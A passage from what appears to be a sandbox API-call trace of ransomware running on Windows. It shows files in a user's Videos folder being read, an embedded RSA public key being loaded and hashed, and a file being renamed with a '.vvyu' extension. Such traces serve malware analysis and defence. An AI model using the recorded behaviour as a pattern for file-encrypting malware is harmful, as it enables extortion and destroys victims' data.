hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0191.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.979] GetCurrentThreadId () returned 0x5d8 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5da8 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.983] GetCurrentThreadId () returned 0x5d8 [0191.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0191.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0191.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af39c0 | out: hHeap=0x2c0000) returned 1 [0191.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.994] WriteFile (in: hFile=0x584, lpBuffer=0x2ae6ea0*, nNumberOfBytesToWrite=0x3ec5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae6ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x3ec5, lpOverlapped=0x0) returned 1 [0191.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ea0 | out: hHeap=0x2c0000) returned 1 [0191.995] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3eca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.995] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.996] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.996] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.996] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.996] CloseHandle (hObject=0x584) returned 1 [0191.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.999] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hA6nEQ04cdHym7b8.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\ha6neq04cdhym7b8.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hA6nEQ04cdHym7b8.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\ha6neq04cdhym7b8.flv.vvyu")) returned 1 [0192.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.001] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.004] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd89160, ftCreationTime.dwHighDateTime=0x1d89efc, ftLastAccessTime.dwLowDateTime=0xb679a6c0, ftLastAccessTime.dwHighDateTime=0x1d89fc1, ftLastWriteTime.dwLowDateTime=0xb679a6c0, ftLastWriteTime.dwHighDateTime=0x1d89fc1, nFileSizeHigh=0x0, nFileSizeLow=0x10f39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iqB1Fd.mkv", cAlternateFileName="")) returned 1 [0192.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af39c0 [0192.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0192.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af39c0 | out: hHeap=0x2c0000) returned 1 [0192.004] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\iqB1Fd.mkv") returned=".mkv" [0192.004] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\iqB1Fd.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\iqb1fd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.005] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=69433) returned 1 [0192.005] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.008] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10f13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.008] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.010] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.010] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10f39, lpOverlapped=0x0) returned 1 [0192.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.012] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.012] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.012] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.013] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.013] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.013] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.013] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.013] GetLastError () returned 0x0 [0192.013] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.013] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.013] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.013] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.013] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10f40) returned 0x2af5168 [0192.014] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af39c0 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0192.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a08 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.015] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.015] HeapFree (in: hHeap=0x2c0000, 